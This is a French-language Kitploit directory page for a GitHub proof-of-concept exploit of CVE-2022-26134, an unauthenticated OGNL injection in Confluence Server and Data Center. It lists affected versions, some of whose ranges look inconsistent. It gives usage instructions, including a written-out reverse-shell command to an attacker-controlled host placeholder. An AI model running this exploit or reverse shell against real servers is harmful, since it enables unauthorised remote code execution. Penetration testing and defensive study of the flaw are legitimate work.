Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-26134 — Un attaquant distant, sans authentification sur Confluence, peut construire une expression OGNL pour l'injecter, exécuter du code arbitraire sur Confluence Server ou Data Center, et a modifié le PoC dans le script existant pour faciliter l'obtention d'un shell. | Kitploit
Outils/GitHubGitHub/keven1z/cve-2022-26134
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et Contrôle
GitHubkeven1z/cve-2022-26134

CVE-2022-26134

Un attaquant distant, sans authentification sur Confluence, peut construire une expression OGNL pour l'injecter, exécuter du code arbitraire sur Confluence Server ou Data Center, et a modifié le PoC dans le script existant pour faciliter l'obtention d'un shell.

Voir le dépôt
72il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-26134

Un attaquant distant non authentifié peut injecter une expression OGNL pour exécuter du code arbitraire sur Confluence Server ou Data Center. PoC modifié pour faciliter le getshell. Port courant : 8090

Versions affectées

  • Confluence Server and Data Center >= 1.3.0
  • 7.14.0 <= Confluence Server and Data Center < 7.4.17
  • 7.13.0 <= Confluence Server and Data Center < 7.13.7
  • 7.14.0 <= Confluence Server and Data Center < 7.14.3
  • 7.15.0 <= Confluence Server and Data Center < 7.15.2
  • 7.16.0 <= Confluence Server and Data Center < 7.16.4
  • 7.17.0 <= Confluence Server and Data Center < 7.17.4
  • 7.18.0 <= Confluence Server and Data Center < 7.18.1

Instructions d'utilisation

root@kitploit:~
pip3 install requests
root@kitploit:~
	   ______     _______     ____   ___ ____  ____      ____   __   _ _____ _  _   
  / ___\ \   / | ____|   |___ \ / _ |___ \|___ \    |___ \ / /_ / |___ /| || |  
 | |    \ \ / /|  _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_ 
 | |___  \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__   _|
  \____|  \_/  |_____|   |_____|\___|_____|_____|   |_____|\___/|_|____/   |_|  
    
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND

CVE-2022-26134

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL cible
  -c COMMAND, --command COMMAND
                        exécuter une commande (execute command), obtenir un shell : /bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1

Utilisation

root@kitploit:~
python3 CVE-2022-26134.py -t [server ip] -c [command] //执行命令

Ce script est destiné uniquement à des fins de test, ne l'utilisez pas à d'autres fins.

Télécharger l’outil